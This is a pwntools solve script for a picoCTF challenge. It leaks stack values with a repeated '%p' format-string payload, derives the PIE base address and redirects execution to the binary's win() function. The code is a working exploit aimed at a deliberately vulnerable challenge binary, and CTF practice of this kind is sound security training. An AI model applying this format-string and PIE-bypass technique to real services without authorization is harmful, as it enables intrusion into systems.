#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
# Challenge binary; its symbols are resolved against exe.address once the PIE base is known.
exe = ELF("./vuln")
context.binary = exe
# Hosted challenge endpoint, used only when the script is run with REMOTE set.
ADDR = "rescued-float.picoctf.net"
PORT = "54718"
def conn() -> remote:
    """Open a tube to the challenge.

    Returns a connection to the hosted service when pwntools' ``args.REMOTE``
    is set, otherwise a freshly spawned local instance of ``exe``.
    """
    if args.REMOTE:
        return remote(ADDR, PORT)
    return process([exe.path])
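def main():
    """Run the solve once: recover the PIE base from the name prompt, then jump to win().

    Steps: connect, answer the name prompt with a run of ``%p`` specifiers
    separated by tabs, take the stack value the author identified as a
    pointer into the binary, subtract the known offset to get the load base,
    and send ``win``'s address at the jump prompt. The tube is closed on every
    path, including when a step raises.
    """
    r = conn()
    # gdb.attach(r, gdbscript='''
    # info proc mappings
    # c
    # ''')
    try:
        # Calculated by inspecting the output - the reported binary start address from gdb
        leak_offset = 0x1441
        # The prompt text itself is not needed; only wait for it.
        r.recvuntil(b'Enter your name:')
        r.sendline(b'%p\t'*20)
        leaks = r.recvline().strip().decode().split('\t')
        # Index 18 (the 19th %p) is the value the author found to lie inside the binary's mapping.
        base_leak = leaks[18]
        # int(..., 16) already accepts the "0x" prefix that %p prints.
        exe.address = int(base_leak, 16) - leak_offset
        # A PIE load base is page-aligned; an unaligned result most likely means the
        # wrong stack slot was picked (e.g. the binary or its build changed), so stop
        # here rather than sending a bogus address.
        if exe.address & 0xfff:
            raise RuntimeError(f"unaligned base {hex(exe.address)} derived from leak {base_leak!r}")
        print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
        print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
        r.sendline(hex(exe.symbols['win']))
        print(r.recvall().decode())
    finally:
        r.close()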
if __name__ == "__main__":
    # Run the solve only when executed as a script, not when imported.
    main()